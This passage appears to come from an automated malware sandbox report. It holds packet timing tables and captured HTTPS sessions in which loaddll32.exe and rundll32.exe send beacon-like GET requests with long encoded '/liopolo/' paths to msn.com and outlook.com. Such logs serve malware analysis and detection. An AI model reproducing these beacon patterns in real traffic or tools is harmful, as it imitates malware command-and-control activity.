                                                                                                                        Oct 12, 2021 00:40:08.731251955 CEST4434986152.98.207.194192.168.2.4
                                                                                                                        Oct 12, 2021 00:40:08.731384993 CEST49861443192.168.2.452.98.207.194
                                                                                                                        Oct 12, 2021 00:40:08.734852076 CEST49861443192.168.2.452.98.207.194
                                                                                                                        Oct 12, 2021 00:40:08.734880924 CEST4434986152.98.207.194192.168.2.4
                                                                                                                        Oct 12, 2021 00:40:08.735236883 CEST4434986152.98.207.194192.168.2.4
                                                                                                                        Oct 12, 2021 00:40:08.738336086 CEST49861443192.168.2.452.98.207.194
                                                                                                                        Oct 12, 2021 00:40:08.768027067 CEST4434986152.98.207.194192.168.2.4
                                                                                                                        Oct 12, 2021 00:40:08.768098116 CEST4434986152.98.207.194192.168.2.4
                                                                                                                        Oct 12, 2021 00:40:08.768214941 CEST49861443192.168.2.452.98.207.194
                                                                                                                        Oct 12, 2021 00:40:08.768472910 CEST49861443192.168.2.452.98.207.194
                                                                                                                        Oct 12, 2021 00:40:08.768496037 CEST4434986152.98.207.194192.168.2.4
                                                                                                                        Oct 12, 2021 00:40:08.796883106 CEST49862443192.168.2.440.101.124.226
                                                                                                                        Oct 12, 2021 00:40:08.796927929 CEST4434986240.101.124.226192.168.2.4
                                                                                                                        Oct 12, 2021 00:40:08.797008991 CEST49862443192.168.2.440.101.124.226
                                                                                                                        Oct 12, 2021 00:40:08.797677994 CEST49862443192.168.2.440.101.124.226
                                                                                                                        Oct 12, 2021 00:40:08.797691107 CEST4434986240.101.124.226192.168.2.4
                                                                                                                        Oct 12, 2021 00:40:08.892551899 CEST4434986240.101.124.226192.168.2.4
                                                                                                                        Oct 12, 2021 00:40:08.892710924 CEST49862443192.168.2.440.101.124.226
                                                                                                                        Oct 12, 2021 00:40:08.896518946 CEST49862443192.168.2.440.101.124.226
                                                                                                                        Oct 12, 2021 00:40:08.896539927 CEST4434986240.101.124.226192.168.2.4
                                                                                                                        Oct 12, 2021 00:40:08.896852970 CEST4434986240.101.124.226192.168.2.4
                                                                                                                        Oct 12, 2021 00:40:08.900259018 CEST49862443192.168.2.440.101.124.226
                                                                                                                        Oct 12, 2021 00:40:08.943140030 CEST4434986240.101.124.226192.168.2.4
                                                                                                                        Oct 12, 2021 00:40:08.974148989 CEST4434986240.101.124.226192.168.2.4
                                                                                                                        Oct 12, 2021 00:40:08.974239111 CEST4434986240.101.124.226192.168.2.4
                                                                                                                        Oct 12, 2021 00:40:08.974373102 CEST49862443192.168.2.440.101.124.226
                                                                                                                        Oct 12, 2021 00:40:08.974689960 CEST49862443192.168.2.440.101.124.226
                                                                                                                        Oct 12, 2021 00:40:08.974706888 CEST4434986240.101.124.226192.168.2.4

                                                                                                                        UDP Packets


                                                                                                                        DNS Queries


                                                                                                                        DNS Answers


                                                                                                                        HTTP Request Dependency Graph

                                                                                                                        • msn.com
                                                                                                                        • outlook.com
                                                                                                                        • www.outlook.com
                                                                                                                        • outlook.office365.com

                                                                                                                        HTTPS Proxied Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.4 | 49776 | 13.82.28.61 | 443 | C:\Windows\System32\loaddll32.exe

Timestamp | kBytes transferred | Direction | Data
2021-10-11 22:38:04 UTC | 0 | OUT | GET /mail/liopolo/31Pla_2BCXtei/1R_2BY6O/xV8Y0PePoExsKvdRsArLjMT/0HY9ewGl4d/RTh7V4sy0BSH_2Btl/9sqK23pzW1xY/kPT6lmvGYLw/Cf2IOR2fhZTyNL/tKZ289_2FYjlbDZolDbOl/xXcWSCD6IlQGRdIS/84EeVY8JQpYoU7N/sMotozvUSzPLgYoFpN/L9urq8t4YJmiCxPtVCV/XUD.jre HTTP/1.1
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Pragma: no-cache
                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                                                        Host: msn.com
                                                                                                                        2021-10-11 22:38:04 UTC | 0 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                        Location: https://www.msn.com/mail/liopolo/31Pla_2BCXtei/1R_2BY6O/xV8Y0PePoExsKvdRsArLjMT/0HY9ewGl4d/RTh7V4sy0BSH_2Btl/9sqK23pzW1xY/kPT6lmvGYLw/Cf2IOR2fhZTyNL/tKZ289_2FYjlbDZolDbOl/xXcWSCD6IlQGRdIS/84EeVY8JQpYoU7N/sMotozvUSzPLgYoFpN/L9urq8t4YJmiCxPtVCV/XUD.jre
                                                                                                                        Server: Microsoft-IIS/8.5
                                                                                                                        X-Powered-By: ASP.NET
                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                        Date: Mon, 11 Oct 2021 22:38:04 GMT
                                                                                                                        Connection: close
                                                                                                                        Content-Length: 373
                                                                                                                        2021-10-11 22:38:04 UTC | 0 | IN | Data Ascii: <head><title>Document Moved</title></head><body><h1>Object Moved</h1>This document may be found <a HREF="https://www.msn.com/mail/liopolo/31Pla_2BCXtei/1R_2BY6O/xV8Y0PePoExsKvdRsArLjMT/0HY9ewGl4d/RTh7V4sy0BSH_2Btl/9sqK23pzW1xY/kPT6lmvGYLw/Cf2IOR2fhZTyNL/


                                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                        1 | 192.168.2.4 | 49779 | 13.82.28.61 | 443 | C:\Windows\System32\loaddll32.exe
                                                                                                                        Timestamp | kBytes transferred | Direction | Data
                                                                                                                        2021-10-11 22:38:11 UTC | 1 | OUT | GET /mail/liopolo/NtZggqxIX2EF9w_2/BavTQ0jHk8z72E0/mrA_2BNo5fGf18qS53/GIhA4FNpc/qIQbJVkxLHpIx3LzJcYF/3uQz3PgIC5Pjndy7vBH/i_2FOaoK6pUzqTQ2mVu3pq/cfXt8VkJHx4pF/9i2ySYSz/e6Fwjd_2BYZ5QEKc2Ev8w_2/FX9nTU6mpV/BkgebLJcyW_2BOHak/X7QoD77ir05E/ic.jre HTTP/1.1
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Pragma: no-cache
                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                                                        Host: msn.com
                                                                                                                        2021-10-11 22:38:11 UTC | 1 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                        Location: https://www.msn.com/mail/liopolo/NtZggqxIX2EF9w_2/BavTQ0jHk8z72E0/mrA_2BNo5fGf18qS53/GIhA4FNpc/qIQbJVkxLHpIx3LzJcYF/3uQz3PgIC5Pjndy7vBH/i_2FOaoK6pUzqTQ2mVu3pq/cfXt8VkJHx4pF/9i2ySYSz/e6Fwjd_2BYZ5QEKc2Ev8w_2/FX9nTU6mpV/BkgebLJcyW_2BOHak/X7QoD77ir05E/ic.jre
                                                                                                                        Server: Microsoft-IIS/8.5
                                                                                                                        X-Powered-By: ASP.NET
                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                        Date: Mon, 11 Oct 2021 22:38:11 GMT
                                                                                                                        Connection: close
                                                                                                                        Content-Length: 377
                                                                                                                        2021-10-11 22:38:11 UTC | 2 | IN | Data Ascii: <head><title>Document Moved</title></head><body><h1>Object Moved</h1>This document may be found <a HREF="https://www.msn.com/mail/liopolo/NtZggqxIX2EF9w_2/BavTQ0jHk8z72E0/mrA_2BNo5fGf18qS53/GIhA4FNpc/qIQbJVkxLHpIx3LzJcYF/3uQz3PgIC5Pjndy7vBH/i_2FOaoK6pUzq


                                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                        10 | 192.168.2.4 | 49860 | 40.97.153.146 | 443 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                        Timestamp | kBytes transferred | Direction | Data
                                                                                                                        2021-10-11 22:40:08 UTC | 14 | OUT | GET /signup/liopolo/dtrpOPrEQ8_2/BH4GVvmMwLv/x_2BNp_2Bcq8rr/i2sFrcRmTMjCNusY3oN7V/abYuA7gYAEh57Xzf/mKvjzhmwo0oocH6/Rx6Zaylm3INx2PjsYP/5tKNcBaCE/Tau2dKL_2B3XpLMrimMx/fEyRGxrtqJjdxkKHFLZ/nn7M4Qsmv3PPoTapEVJO6K/P8DaDVIqQXr3N/9BeM5e5l/i_2F.jre HTTP/1.1
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Pragma: no-cache
                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                                                        Host: outlook.com
                                                                                                                        2021-10-11 22:40:08 UTC | 14 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Pragma: no-cache
                                                                                                                        Location: https://www.outlook.com/signup/liopolo/dtrpOPrEQ8_2/BH4GVvmMwLv/x_2BNp_2Bcq8rr/i2sFrcRmTMjCNusY3oN7V/abYuA7gYAEh57Xzf/mKvjzhmwo0oocH6/Rx6Zaylm3INx2PjsYP/5tKNcBaCE/Tau2dKL_2B3XpLMrimMx/fEyRGxrtqJjdxkKHFLZ/nn7M4Qsmv3PPoTapEVJO6K/P8DaDVIqQXr3N/9BeM5e5l/i_2F.jre
                                                                                                                        Server: Microsoft-IIS/10.0
                                                                                                                        request-id: 448417ac-9aed-bf6f-b902-bf5f92a7f6fb
                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                        X-FEServer: BN6PR2001CA0022
                                                                                                                        X-RequestId: 0a3dbc15-af9f-42a8-9d5e-2a0de062e8b5
                                                                                                                        MS-CV: rBeERO2ab7+5Ar9fkqf2+w.0
                                                                                                                        X-Powered-By: ASP.NET
                                                                                                                        X-FEServer: BN6PR2001CA0022
                                                                                                                        Date: Mon, 11 Oct 2021 22:40:08 GMT
                                                                                                                        Connection: close
                                                                                                                        Content-Length: 0


                                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                        11 | 192.168.2.4 | 49861 | 52.98.207.194 | 443 | C:\Windows\System32\loaddll32.exe
                                                                                                                        Timestamp | kBytes transferred | Direction | Data
                                                                                                                        2021-10-11 22:40:08 UTC | 15 | OUT | GET /signup/liopolo/dtrpOPrEQ8_2/BH4GVvmMwLv/x_2BNp_2Bcq8rr/i2sFrcRmTMjCNusY3oN7V/abYuA7gYAEh57Xzf/mKvjzhmwo0oocH6/Rx6Zaylm3INx2PjsYP/5tKNcBaCE/Tau2dKL_2B3XpLMrimMx/fEyRGxrtqJjdxkKHFLZ/nn7M4Qsmv3PPoTapEVJO6K/P8DaDVIqQXr3N/9BeM5e5l/i_2F.jre HTTP/1.1
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Pragma: no-cache
                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                                                        Host: www.outlook.com
                                                                                                                        2021-10-11 22:40:08 UTC | 15 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Pragma: no-cache
                                                                                                                        Location: https://outlook.office365.com/signup/liopolo/dtrpOPrEQ8_2/BH4GVvmMwLv/x_2BNp_2Bcq8rr/i2sFrcRmTMjCNusY3oN7V/abYuA7gYAEh57Xzf/mKvjzhmwo0oocH6/Rx6Zaylm3INx2PjsYP/5tKNcBaCE/Tau2dKL_2B3XpLMrimMx/fEyRGxrtqJjdxkKHFLZ/nn7M4Qsmv3PPoTapEVJO6K/P8DaDVIqQXr3N/9BeM5e5l/i_2F.jre
                                                                                                                        Server: Microsoft-IIS/10.0
                                                                                                                        request-id: 6f503dd6-681b-92e6-0e33-05fdd79ea39d
                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                        X-FEServer: AS9PR0301CA0009
                                                                                                                        X-RequestId: 5f53b19c-6d27-4c9c-b051-e6d331879eab
                                                                                                                        MS-CV: 1j1Qbxto5pIOMwX9156jnQ.0
                                                                                                                        X-Powered-By: ASP.NET
                                                                                                                        X-FEServer: AS9PR0301CA0009
                                                                                                                        Date: Mon, 11 Oct 2021 22:40:08 GMT
                                                                                                                        Connection: close
                                                                                                                        Content-Length: 0


                                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                        12 | 192.168.2.4 | 49862 | 40.101.124.226 | 443 | C:\Windows\System32\loaddll32.exe
                                                                                                                        Timestamp | kBytes transferred | Direction | Data
                                                                                                                        2021-10-11 22:40:08 UTC | 16 | OUT | GET /signup/liopolo/dtrpOPrEQ8_2/BH4GVvmMwLv/x_2BNp_2Bcq8rr/i2sFrcRmTMjCNusY3oN7V/abYuA7gYAEh57Xzf/mKvjzhmwo0oocH6/Rx6Zaylm3INx2PjsYP/5tKNcBaCE/Tau2dKL_2B3XpLMrimMx/fEyRGxrtqJjdxkKHFLZ/nn7M4Qsmv3PPoTapEVJO6K/P8DaDVIqQXr3N/9BeM5e5l/i_2F.jre HTTP/1.1
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Pragma: no-cache
                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                                                        Host: outlook.office365.com
                                                                                                                        2021-10-11 22:40:08 UTC | 16 | IN | HTTP/1.1 404 Not Found
                                                                                                                        Content-Length: 1245
                                                                                                                        Content-Type: text/html
                                                                                                                        Server: Microsoft-IIS/10.0
                                                                                                                        request-id: bd6df30b-3506-0654-39aa-09111fc341ce
                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                        Alt-Svc: h3=":443",h3-29=":443"
                                                                                                                        X-CalculatedFETarget: VI1PR07CU008.internal.outlook.com
                                                                                                                        X-BackEndHttpStatus: 404
                                                                                                                        X-FEProxyInfo: VI1PR07CA0252.EURPRD07.PROD.OUTLOOK.COM
                                                                                                                        X-CalculatedBETarget: VI1PR01MB6621.EURPRD01.PROD.EXCHANGELABS.COM
                                                                                                                        X-BackEndHttpStatus: 404
                                                                                                                        X-RUM-Validated: 1
                                                                                                                        X-Proxy-RoutingCorrectness: 1
                                                                                                                        X-Proxy-BackendServerStatus: 404
                                                                                                                        MS-CV: C/NtvQY1VAY5qgkRH8NBzg.1.1
                                                                                                                        X-FEServer: VI1PR07CA0252
                                                                                                                        X-Powered-By: ASP.NET
                                                                                                                        X-FEServer: AM5PR0101CA0012
                                                                                                                        Date: Mon, 11 Oct 2021 22:40:08 GMT
                                                                                                                        Connection: close
                                                                                                                        2021-10-11 22:40:08 UTC | 17 | IN | Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - Fil


                                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                        2 | 192.168.2.4 | 49806 | 40.97.116.82 | 443 | C:\Windows\System32\loaddll32.exe
                                                                                                                        Timestamp | kBytes transferred | Direction | Data
                                                                                                                        2021-10-11 22:38:46 UTC | 2 | OUT | GET /signup/liopolo/D7_2FrbWNPWoNOhc8CKrYUD/YRyHNJx0fY/hev8f_2BW8cdb94NA/BoQXWWXay0D_/2BZ8Igd1CtC/8Zrwrke0SVrRun/EK5gc9OXOLgsoPgBxCQd1/LxUG0ef0GKyYljGP/_2FJyXjT77_2FZy/ZTRUMkvuvl3KPO1sTr/Mf1qwqvM6/BRuq80kiRu4imCu3Mccr/qTiEDWDGE96/Qopva.jre HTTP/1.1
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Pragma: no-cache
                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                                                        Host: outlook.com
                                                                                                                        2021-10-11 22:38:46 UTC | 2 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Pragma: no-cache
                                                                                                                        Location: https://www.outlook.com/signup/liopolo/D7_2FrbWNPWoNOhc8CKrYUD/YRyHNJx0fY/hev8f_2BW8cdb94NA/BoQXWWXay0D_/2BZ8Igd1CtC/8Zrwrke0SVrRun/EK5gc9OXOLgsoPgBxCQd1/LxUG0ef0GKyYljGP/_2FJyXjT77_2FZy/ZTRUMkvuvl3KPO1sTr/Mf1qwqvM6/BRuq80kiRu4imCu3Mccr/qTiEDWDGE96/Qopva.jre
                                                                                                                        Server: Microsoft-IIS/10.0
                                                                                                                        request-id: d3c10e4c-5e49-3a6f-0bca-0aa8eeb05a44
                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                        X-FEServer: MWHPR13CA0010
                                                                                                                        X-RequestId: dd82cfc2-7512-45b0-82e8-afbaf83fa8be
                                                                                                                        MS-CV: TA7B00lebzoLygqo7rBaRA.0
                                                                                                                        X-Powered-By: ASP.NET
                                                                                                                        X-FEServer: MWHPR13CA0010
                                                                                                                        Date: Mon, 11 Oct 2021 22:38:46 GMT
                                                                                                                        Connection: close
                                                                                                                        Content-Length: 0


                                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                        3 | 192.168.2.4 | 49807 | 52.97.183.162 | 443 | C:\Windows\System32\loaddll32.exe
                                                                                                                        Timestamp | kBytes transferred | Direction | Data
                                                                                                                        2021-10-11 22:38:46 UTC | 3 | OUT | GET /signup/liopolo/D7_2FrbWNPWoNOhc8CKrYUD/YRyHNJx0fY/hev8f_2BW8cdb94NA/BoQXWWXay0D_/2BZ8Igd1CtC/8Zrwrke0SVrRun/EK5gc9OXOLgsoPgBxCQd1/LxUG0ef0GKyYljGP/_2FJyXjT77_2FZy/ZTRUMkvuvl3KPO1sTr/Mf1qwqvM6/BRuq80kiRu4imCu3Mccr/qTiEDWDGE96/Qopva.jre HTTP/1.1
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Pragma: no-cache
                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                                                        Host: www.outlook.com
                                                                                                                        2021-10-11 22:38:46 UTC | 4 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Pragma: no-cache
                                                                                                                        Location: https://outlook.office365.com/signup/liopolo/D7_2FrbWNPWoNOhc8CKrYUD/YRyHNJx0fY/hev8f_2BW8cdb94NA/BoQXWWXay0D_/2BZ8Igd1CtC/8Zrwrke0SVrRun/EK5gc9OXOLgsoPgBxCQd1/LxUG0ef0GKyYljGP/_2FJyXjT77_2FZy/ZTRUMkvuvl3KPO1sTr/Mf1qwqvM6/BRuq80kiRu4imCu3Mccr/qTiEDWDGE96/Qopva.jre
                                                                                                                        Server: Microsoft-IIS/10.0
                                                                                                                        request-id: 4827db24-f7db-9519-6b3d-e535d1121fb8
                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                        X-FEServer: AM7PR03CA0018
                                                                                                                        X-RequestId: f1bbbeb9-c424-4847-91c0-206d8d6abcc1
                                                                                                                        MS-CV: JNsnSNv3GZVrPeU10RIfuA.0
                                                                                                                        X-Powered-By: ASP.NET
                                                                                                                        X-FEServer: AM7PR03CA0018
                                                                                                                        Date: Mon, 11 Oct 2021 22:38:46 GMT
                                                                                                                        Connection: close
                                                                                                                        Content-Length: 0


                                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                        4 | 192.168.2.4 | 49808 | 52.97.218.82 | 443 | C:\Windows\System32\loaddll32.exe
                                                                                                                        Timestamp | kBytes transferred | Direction | Data
                                                                                                                        2021-10-11 22:38:46 UTC | 4 | OUT | GET /signup/liopolo/D7_2FrbWNPWoNOhc8CKrYUD/YRyHNJx0fY/hev8f_2BW8cdb94NA/BoQXWWXay0D_/2BZ8Igd1CtC/8Zrwrke0SVrRun/EK5gc9OXOLgsoPgBxCQd1/LxUG0ef0GKyYljGP/_2FJyXjT77_2FZy/ZTRUMkvuvl3KPO1sTr/Mf1qwqvM6/BRuq80kiRu4imCu3Mccr/qTiEDWDGE96/Qopva.jre HTTP/1.1
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Pragma: no-cache
                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                                                        Host: outlook.office365.com
2021-10-11 22:38:46 UTC | 5 | IN | HTTP/1.1 404 Not Found
                                                                                                                        Content-Length: 1245
                                                                                                                        Content-Type: text/html
                                                                                                                        Server: Microsoft-IIS/10.0
                                                                                                                        request-id: fee0e76a-0690-24c5-d39f-a0f3ac107e50
                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                        X-CalculatedFETarget: VI1PR0102CU003.internal.outlook.com
                                                                                                                        X-BackEndHttpStatus: 404
                                                                                                                        X-FEProxyInfo: VI1PR0102CA0087.EURPRD01.PROD.EXCHANGELABS.COM
                                                                                                                        X-CalculatedBETarget: VI1PR04MB4495.eurprd04.prod.outlook.com
                                                                                                                        X-BackEndHttpStatus: 404
                                                                                                                        X-RUM-Validated: 1
                                                                                                                        X-Proxy-RoutingCorrectness: 1
                                                                                                                        X-Proxy-BackendServerStatus: 404
                                                                                                                        MS-CV: aufg/pAGxSTTn6DzrBB+UA.1.1
                                                                                                                        X-FEServer: VI1PR0102CA0087
                                                                                                                        X-Powered-By: ASP.NET
                                                                                                                        X-FEServer: AS8PR04CA0081
                                                                                                                        Date: Mon, 11 Oct 2021 22:38:46 GMT
                                                                                                                        Connection: close
2021-10-11 22:38:46 UTC | 5 | IN | Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - Fil


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
5 | 192.168.2.4 | 49809 | 40.97.153.146 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-11 22:38:53 UTC | 7 | OUT | GET /signup/liopolo/rNcthdwaMuA/zHzDKpXzKq0_2F/hgSdOtaWvkDNGgYpqBLqh/fnirw5AL03xUm4gv/1SKDwhrC85cQhDG/iqhTJ3hi9wsaeKx0vI/xO4E5YLZP/YP9uSugvYABSkowPk9S_/2B24KB1lGZ7pVE71wAB/PNLOy1DTAkJRmo3faOVpWQ/D9BP51I5FAmCi/mjxkDJSf_2B0/dO3cuvbU.jre HTTP/1.1
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Pragma: no-cache
                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                                                        Host: outlook.com
2021-10-11 22:38:53 UTC | 7 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Pragma: no-cache
                                                                                                                        Location: https://www.outlook.com/signup/liopolo/rNcthdwaMuA/zHzDKpXzKq0_2F/hgSdOtaWvkDNGgYpqBLqh/fnirw5AL03xUm4gv/1SKDwhrC85cQhDG/iqhTJ3hi9wsaeKx0vI/xO4E5YLZP/YP9uSugvYABSkowPk9S_/2B24KB1lGZ7pVE71wAB/PNLOy1DTAkJRmo3faOVpWQ/D9BP51I5FAmCi/mjxkDJSf_2B0/dO3cuvbU.jre
                                                                                                                        Server: Microsoft-IIS/10.0
                                                                                                                        request-id: 556c818d-51ec-ad8d-c23c-618ef38fd56c
                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                        X-FEServer: BN6PR2001CA0003
                                                                                                                        X-RequestId: d6343e44-52af-49e0-aabf-9bf1bd538048
                                                                                                                        MS-CV: jYFsVexRja3CPGGO84/VbA.0
                                                                                                                        X-Powered-By: ASP.NET
                                                                                                                        X-FEServer: BN6PR2001CA0003
                                                                                                                        Date: Mon, 11 Oct 2021 22:38:52 GMT
                                                                                                                        Connection: close
                                                                                                                        Content-Length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
6 | 192.168.2.4 | 49810 | 52.97.218.66 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-11 22:38:53 UTC | 8 | OUT | GET /signup/liopolo/rNcthdwaMuA/zHzDKpXzKq0_2F/hgSdOtaWvkDNGgYpqBLqh/fnirw5AL03xUm4gv/1SKDwhrC85cQhDG/iqhTJ3hi9wsaeKx0vI/xO4E5YLZP/YP9uSugvYABSkowPk9S_/2B24KB1lGZ7pVE71wAB/PNLOy1DTAkJRmo3faOVpWQ/D9BP51I5FAmCi/mjxkDJSf_2B0/dO3cuvbU.jre HTTP/1.1
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Pragma: no-cache
                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                                                        Host: www.outlook.com
2021-10-11 22:38:53 UTC | 8 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Pragma: no-cache
                                                                                                                        Location: https://outlook.office365.com/signup/liopolo/rNcthdwaMuA/zHzDKpXzKq0_2F/hgSdOtaWvkDNGgYpqBLqh/fnirw5AL03xUm4gv/1SKDwhrC85cQhDG/iqhTJ3hi9wsaeKx0vI/xO4E5YLZP/YP9uSugvYABSkowPk9S_/2B24KB1lGZ7pVE71wAB/PNLOy1DTAkJRmo3faOVpWQ/D9BP51I5FAmCi/mjxkDJSf_2B0/dO3cuvbU.jre
                                                                                                                        Server: Microsoft-IIS/10.0
                                                                                                                        request-id: fa41d79f-b084-e275-06fd-7c804baa2baf
                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                        X-FEServer: AS8PR04CA0017
                                                                                                                        X-RequestId: 5790813c-b01e-46a4-ac89-6c67c15fc018
                                                                                                                        MS-CV: n9dB+oSwdeIG/XyAS6orrw.0
                                                                                                                        X-Powered-By: ASP.NET
                                                                                                                        X-FEServer: AS8PR04CA0017
                                                                                                                        Date: Mon, 11 Oct 2021 22:38:52 GMT
                                                                                                                        Connection: close
                                                                                                                        Content-Length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
7 | 192.168.2.4 | 49811 | 52.97.137.210 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-11 22:38:53 UTC | 9 | OUT | GET /signup/liopolo/rNcthdwaMuA/zHzDKpXzKq0_2F/hgSdOtaWvkDNGgYpqBLqh/fnirw5AL03xUm4gv/1SKDwhrC85cQhDG/iqhTJ3hi9wsaeKx0vI/xO4E5YLZP/YP9uSugvYABSkowPk9S_/2B24KB1lGZ7pVE71wAB/PNLOy1DTAkJRmo3faOVpWQ/D9BP51I5FAmCi/mjxkDJSf_2B0/dO3cuvbU.jre HTTP/1.1
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Pragma: no-cache
                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                                                        Host: outlook.office365.com
2021-10-11 22:38:53 UTC | 9 | IN | HTTP/1.1 404 Not Found
                                                                                                                        Content-Length: 1245
                                                                                                                        Content-Type: text/html
                                                                                                                        Server: Microsoft-IIS/10.0
                                                                                                                        request-id: 463ae588-6705-a5a4-dc70-c20dde540b89
                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                        X-CalculatedFETarget: HE1PR0202CU001.internal.outlook.com
                                                                                                                        X-BackEndHttpStatus: 404
                                                                                                                        X-FEProxyInfo: HE1PR0202CA0016.EURPRD02.PROD.OUTLOOK.COM
                                                                                                                        X-CalculatedBETarget: HE1P194MB0201.EURP194.PROD.OUTLOOK.COM
                                                                                                                        X-BackEndHttpStatus: 404
                                                                                                                        X-RUM-Validated: 1
                                                                                                                        X-Proxy-RoutingCorrectness: 1
                                                                                                                        X-Proxy-BackendServerStatus: 404
                                                                                                                        MS-CV: iOU6RgVnpKXccMIN3lQLiQ.1.1
                                                                                                                        X-FEServer: HE1PR0202CA0016
                                                                                                                        X-Powered-By: ASP.NET
                                                                                                                        X-FEServer: AM6P194CA0062
                                                                                                                        Date: Mon, 11 Oct 2021 22:38:53 GMT
                                                                                                                        Connection: close
2021-10-11 22:38:53 UTC | 10 | IN | Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - Fil


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
8 | 192.168.2.4 | 49827 | 13.82.28.61 | 443 | C:\Windows\System32\loaddll32.exe
Timestamp | kBytes transferred | Direction | Data
